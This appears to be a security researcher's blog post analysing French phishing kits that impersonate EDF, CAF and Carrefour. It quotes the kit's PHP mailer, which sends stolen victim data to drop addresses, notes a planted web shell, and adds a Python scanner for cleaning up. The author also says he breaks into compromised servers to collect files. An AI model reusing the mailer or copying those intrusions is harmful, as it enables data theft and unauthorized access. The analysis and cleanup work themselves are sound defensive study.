These days they do EDF+CAF and back with Carrefour.
EDF: http://www.phishtank.com/phish_detail.php?phish_id=1720045 > 2/33
bigcave.php:
// Excerpt of the kit's mailer: harvested data ($message) is sent to two drop addresses,
// with the victim's IP in the subject line.
$send="Ayoub.boos7@hotmai1.fr";
$subject="EDF : $ip";
$from="From: Tool4Spam.Com" ;
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
Dumped pages: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2431#p18023
Shells: http://www.kernelmode.info/forum/viewtopic.php?f=16&t=2410&start=10#p18024
The mechanism is interesting on this one:
It extracts a zip file into a freshly created dir and writes the EDF customer's IP to Vcounter.txt.
It seems the bad guys tested it to see if everything works :)
It's always these 41.x IPs from Morocco.
(CF: Access logs of http://www.xylibox.com/2013/01/phish-bankfraudphpmailerphpshell.html)
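For anyone cleaning up a hijacked server that hosted one of these kits, the mailer excerpt above and the Vcounter.txt log are the artifacts to look for. The following is an added example (not code from the post or from the kit) that pulls the hardcoded drop addresses and subject templates out of PHP mailers and flags the kit's IP log; it assumes the simple `$var="literal";` then `mail($var, ...)` idiom shown in bigcave.php and uses that excerpt as its sample input.

```python
import re
from pathlib import Path

# Patterns for the mailer idiom in bigcave.php: a double-quoted literal assigned
# to a variable, then passed as recipient or subject to mail().
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
MAIL_RE = re.compile(r'\bmail\s*\(\s*("[^"]*"|\$\w+)\s*,\s*("[^"]*"|\$\w+)')
EMAIL_RE = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')

def _resolve(token, assigns):
    """Turn a mail() argument token into its literal value, or None if unknown."""
    if token.startswith('"'):
        return token.strip('"')
    return assigns.get(token[1:])  # variable not assigned a plain literal -> None

def find_mailer(php_source):
    """Return the drop addresses and subject templates used by mail() calls."""
    assigns = dict(ASSIGN_RE.findall(php_source))
    drops, subjects = set(), set()
    for rcpt, subj in MAIL_RE.findall(php_source):
        r = _resolve(rcpt, assigns)
        if r and EMAIL_RE.fullmatch(r):
            drops.add(r)
        s = _resolve(subj, assigns)
        if s:
            subjects.add(s)
    return {"drop_addresses": sorted(drops), "subjects": sorted(subjects)}

def scan_webroot(root):
    """Walk a recovered web root: report PHP files with a hardcoded mailer and
    any copy of the kit's victim-IP log (Vcounter.txt)."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.name == "Vcounter.txt":
            findings[str(path)] = {"note": "kit log of victim IPs"}
        elif path.suffix == ".php":
            hit = find_mailer(path.read_text(errors="replace"))
            if hit["drop_addresses"]:
                findings[str(path)] = hit
    return findings

# Sample input: the bigcave.php excerpt quoted in the post.
SAMPLE = '''$send="Ayoub.boos7@hotmai1.fr";
$subject="EDF : $ip";
$from="From: Tool4Spam.Com" ;
mail($send,$subject,$message,$from);
mail("z0ba@live.com",$subject,$message,$from);
'''

if __name__ == "__main__":
    print(find_mailer(SAMPLE))
```

Run `scan_webroot("/path/to/recovered/webroot")` against a copy of the compromised site to list every mailer and Vcounter.txt it contains; the drop addresses are what you report to the mail providers.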
The bad guys left Backdoor.PHP.WebShell.BD (WSO 2.4) as usual:
'Nice'
Spamtool:
And some other crap...
For CAF and Carrefour they did not use hijacked servers (only for the redirect).
Carrefour: http://www.phishtank.com/phish_detail.php?phish_id=1719809
CAF: http://www.phishtank.com/phish_detail.php?phish_id=1719804
The CAF mail is just a big failure:
Bank customers replying to the phishing e-mail:
A new tool has appeared; phishers will probably be interested.
Also, I got an interesting mail:
That becomes a problem when hackers use hijacked servers (especially for phishing and malware hosting).
I consider myself borderline: I re-break these servers with my real IP to get the malicious stuff.
I leave files untouched, including the hackers' files; sometimes I probably make more shit than them in the log files, and I don't edit them to hide my IP.
I have never been sued for hacking a compromised machine, and I hope that will not happen.